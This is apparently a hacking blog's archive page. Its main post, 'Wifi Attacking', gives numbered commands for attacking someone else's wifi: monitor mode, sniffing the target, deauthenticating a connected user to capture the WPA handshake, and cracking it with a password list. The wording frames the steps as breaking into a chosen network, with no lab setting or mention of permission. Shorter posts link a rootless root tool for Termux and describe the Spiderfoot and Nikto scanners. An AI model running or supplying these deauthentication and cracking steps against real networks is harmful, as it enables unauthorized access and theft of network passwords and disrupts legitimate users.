Posts

Showing posts from December, 2023

Wifi Attacking

Image
REST IMAGES/PDF LINK IS IN BELOW:- HAPPY HACKING:) 812255 https://www.dropbox.com/scl/fo/yg6k4bamr7wv58j93sq1i/h?rlkey=ykqwgg7ynn9ep6mzxcg77wged&dl=0 1. iwconfig 2. ifconfig wlan0 down 3. iwconfig wlan0 mode monitor 4. ifconfig wlan0 up 5. airodump-ng wlan0 Choose the BSSD id of the wifi that you want to hack 6. airodump-ng --bssd <mac address of the wifi here> --channel <here> wlan0 --write <enter file name that store sniffing data> Open new root terminal 7. aireplay-ng --deauth 40 -a <Wifi mac address here> -c <mac address of user who is connected to that wifi> wlan0 8. ls handshake file is captured and stored where we start the process 9. aircrack-ng <name of handshake file here> -w 10-million-password-list-top-1000000.txt That's it 😎 Now it takes a while to crack the handshake file and showed the wifi password 🔑

root access in termux in android rootless

https://github.com/hctilg/root-termux

Spiderfoot 4.0.0: Open Source Intelligence Automation.

 spiderfoot -l ipaddress:ports

Nikto : A web scanner tool for security weakness.

 Nikto is an open-source web server scanner that performs comprehensive tests against web servers for multiple security vulnerabilities. It is designed to identify various issues, including outdated server software, potential misconfigurations, and known vulnerabilities in web servers and web applications. Nikto is commonly used by security professionals, system administrators, and penetration testers to assess the security posture of web servers and identify potential weaknesses that could be exploited by attackers. It works by sending a series of predefined requests to the target server and analyzing the responses to determine if there are any security vulnerabilities. Some of the key features of Nikto include: 1. **Outdated Software Detection:** Nikto can identify outdated server software and known vulnerabilities associated with specific versions. 2. **Misconfiguration Checks:** It looks for common web server misconfigurations that might expose sensitive information or create secur